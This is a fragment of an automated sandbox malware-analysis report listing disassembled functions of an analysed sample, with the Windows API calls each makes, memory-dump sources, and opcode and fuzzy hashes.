                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: psapi.dll
                                                                                      • API String ID: 1029625771-80456845
                                                                                      • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                      • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                      • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                      • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                      Function 6C5D4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,6C5D8DC8), ref: 6C5D4F78
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: psapi.dll
                                                                                      • API String ID: 1029625771-80456845
                                                                                      • Opcode ID: da9ba6b9108b5a1da7a69163ff45c9fd3a871f795f47dd764ef31cb7843d73a1
                                                                                      • Instruction ID: 346e92fae3619d098be94a854bc999274014aaf96139f4514e4f6619d58bc06a
                                                                                      • Opcode Fuzzy Hash: da9ba6b9108b5a1da7a69163ff45c9fd3a871f795f47dd764ef31cb7843d73a1
                                                                                      • Instruction Fuzzy Hash: 11E001B1A01B108F87B0CF3EA544642BEF0BB086523118E2EA09EC3A00E730A5848F84
                                                                                      Function 11014F80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: nslsp.dll
                                                                                      • API String ID: 1029625771-3933918195
                                                                                      • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                      • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                      • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                      • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                      Function 11074DC0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 11074E1F
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary_memset
                                                                                      • String ID:
                                                                                      • API String ID: 1654520187-0
                                                                                      • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                      • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                      • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                      • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                      Function 110883D0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 110883EF
                                                                                      • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection_memset
                                                                                      • String ID:
                                                                                      • API String ID: 453477542-0
                                                                                      • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                      • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                      • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                      • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                      Function 11144440 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                      • ExtractIconExA.SHELL32(?,00000000,00050469,00040493,00000001), ref: 11144498
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExtractFileIconModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3911389742-0
                                                                                      • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                      • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                      • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                      • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                      Function 11163DB7 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                      • __lock_file.LIBCMT ref: 11163DFE
                                                                                        • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                      • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                      • String ID:
                                                                                      • API String ID: 2800547568-0
                                                                                      • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                      • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                      • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                      • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                      Function 6C5E6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6C26
                                                                                      • Sleep.KERNEL32(00000064), ref: 6C5E6C5B
                                                                                        • Part of subcall function 6C5E6940: GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 4250438611-0
                                                                                      • Opcode ID: f1395915c1e69caa02b37049a3f34b92a0f1bc81fe28f4ce928e322978903d14
                                                                                      • Instruction ID: 5c06991088173c470f759b7a2080c7f30e7aae5c20f2013a738cd78e48c7af01
                                                                                      • Opcode Fuzzy Hash: f1395915c1e69caa02b37049a3f34b92a0f1bc81fe28f4ce928e322978903d14
                                                                                      • Instruction Fuzzy Hash: C6F03071700308CECF14EA6A9D9635CB6B1DBA639AF120037C616D6E90DF745884C749
                                                                                      Function 6C5D63A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSACancelBlockingCall.WSOCK32 ref: 6C5D63A9
                                                                                      • Sleep.KERNEL32(00000032), ref: 6C5D63B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: BlockingCallCancelSleep
                                                                                      • String ID:
                                                                                      • API String ID: 3706969569-0
                                                                                      • Opcode ID: c443bbb7c17a30be6c3a42f858cb2093c76a35b5b8b0053dda7328189b0e033c
                                                                                      • Instruction ID: f274e3945454fef5c1105bf473dafe4b7b9938a92db539b2a6d72b189ff1db9d
                                                                                      • Opcode Fuzzy Hash: c443bbb7c17a30be6c3a42f858cb2093c76a35b5b8b0053dda7328189b0e033c
                                                                                      • Instruction Fuzzy Hash: 2FB092B0392350CDAF01177E4D0629A30D80FC424BF6208606A51CAD8AEF20D506A929
                                                                                      Function 11144EA0 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                        • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                      • GetLastError.KERNEL32(?,0286B8D0,000000FF,?), ref: 11144ED5
                                                                                      • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0286B8D0,000000FF,?), ref: 11144EE5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                      • String ID:
                                                                                      • API String ID: 3768737497-0
                                                                                      • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                      • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                      • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                      • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                      Function 110106C0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_
                                                                                      • String ID:
                                                                                      • API String ID: 3382485803-0
                                                                                      • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                      • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                      • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                      • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                      Function 11143000 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                      • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                      • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                      • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                      Function 110FACC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
